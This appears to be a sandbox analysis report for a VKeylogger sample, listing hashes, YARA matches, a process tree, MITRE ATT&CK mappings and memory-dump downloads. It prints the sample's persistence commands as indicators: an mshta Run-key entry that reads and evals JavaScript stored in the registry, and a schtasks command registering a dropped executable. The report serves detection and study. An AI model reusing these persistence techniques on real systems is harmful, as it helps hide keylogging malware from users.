vkeylogger | 7004285faaa3caabec19f6382f86f380da6fbe1eb5d624a7bc2a9e999a5ba79d

General

Target

9e559c854f7b4c66ffbe7702e8f49cd0.exe
Size

154KB
MD5

9e559c854f7b4c66ffbe7702e8f49cd0
SHA1

cd28198ef48a50b3d14dc8eb5d37f505b2c85c33
SHA256

7004285faaa3caabec19f6382f86f380da6fbe1eb5d624a7bc2a9e999a5ba79d
SHA512

c2c751b71a3b7a2bcade9d59b7071ee4af5f239be4fd2075fb2a4d6bfa23ca1edde4083f0a0aafb578bc1161e5ec5b34587f2596b20309d9541c35df67585e89

Score

10^/10

vkeylogger keylogger persistence stealer

Malware Config

Signatures

VKeylogger
A keylogger first seen in Nov 2020.
stealer keylogger vkeylogger

VKeylogger Payload 3 IoCs

resource	yara_rule
behavioral2/memory/4008-115-0x0000000000030000-0x000000000003E000-memory.dmp	family_vkeylogger
behavioral2/memory/4008-116-0x0000000000400000-0x0000000002144000-memory.dmp	family_vkeylogger
behavioral2/memory/3720-118-0x0000000000CD0000-0x0000000000CDF000-memory.dmp	family_vkeylogger

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
2140	339.exe
4008	0A5A790831FC417006623.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nfnur = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9e559c854f7b4c66ffbe7702e8f49cd0.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Windows\\system32\\mshta.exe javascript:x=new%20ActiveXObject(\"wscript.shell\");v=x.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\SMSvcHost\\\\ComponentID\");eval(v);"	explorer.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\0Ep9c\qx5ow97Y	0A5A790831FC417006623.exe
File created	C:\Windows\SysWOW64\knRwIY3Bz\5LqlvOPDt1v\iS6oc	0A5A790831FC417006623.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4008 set thread context of 3720	4008	9e559c854f7b4c66ffbe7702e8f49cd0.exe	76

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2232	schtasks.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4008	9e559c854f7b4c66ffbe7702e8f49cd0.exe
3720	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3720	explorer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3720	explorer.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4008 wrote to memory of 3720	4008	9e559c854f7b4c66ffbe7702e8f49cd0.exe	76
PID 4008 wrote to memory of 3720	4008	9e559c854f7b4c66ffbe7702e8f49cd0.exe	76
PID 4008 wrote to memory of 3720	4008	9e559c854f7b4c66ffbe7702e8f49cd0.exe	76
PID 3720 wrote to memory of 2140	3720	explorer.exe	80
PID 3720 wrote to memory of 2140	3720	explorer.exe	80
PID 3720 wrote to memory of 2140	3720	explorer.exe	80
PID 2140 wrote to memory of 3880	2140	339.exe	82
PID 2140 wrote to memory of 3880	2140	339.exe	82
PID 2140 wrote to memory of 3880	2140	339.exe	82
PID 3880 wrote to memory of 2232	3880	cmd.exe	84
PID 3880 wrote to memory of 2232	3880	cmd.exe	84
PID 3880 wrote to memory of 2232	3880	cmd.exe	84

C:\Users\Admin\AppData\Local\Temp\9e559c854f7b4c66ffbe7702e8f49cd0.exe
"C:\Users\Admin\AppData\Local\Temp\9e559c854f7b4c66ffbe7702e8f49cd0.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4008
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3720
- - C:\Users\Admin\AppData\Local\Temp\339.exe
    "C:\Users\Admin\AppData\Local\Temp\339.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2140
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /tn \0A5A790831FC417006623 /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\0A5A790831FC417006623\0A5A790831FC417006623.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3880
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \0A5A790831FC417006623 /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\0A5A790831FC417006623\0A5A790831FC417006623.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        5⤵
        Creates scheduled task(s)
        
        PID:2232

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\0A5A790831FC417006623\0A5A790831FC417006623.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\0A5A790831FC417006623\0A5A790831FC417006623.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4008

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2140-124-0x0000000001220000-0x0000000001222000-memory.dmp

Filesize
8KB

Download
memory/2140-125-0x0000000000BE0000-0x0000000000BF3000-memory.dmp

Filesize
76KB

Download
memory/3720-118-0x0000000000CD0000-0x0000000000CDF000-memory.dmp

Filesize
60KB

Download
memory/4008-115-0x0000000000030000-0x000000000003E000-memory.dmp

Filesize
56KB

Download
memory/4008-116-0x0000000000400000-0x0000000002144000-memory.dmp

Filesize
29.3MB

Download
memory/4008-128-0x0000000000BE0000-0x0000000000BF3000-memory.dmp

Filesize
76KB

Download
memory/4008-127-0x0000000002800000-0x0000000002802000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads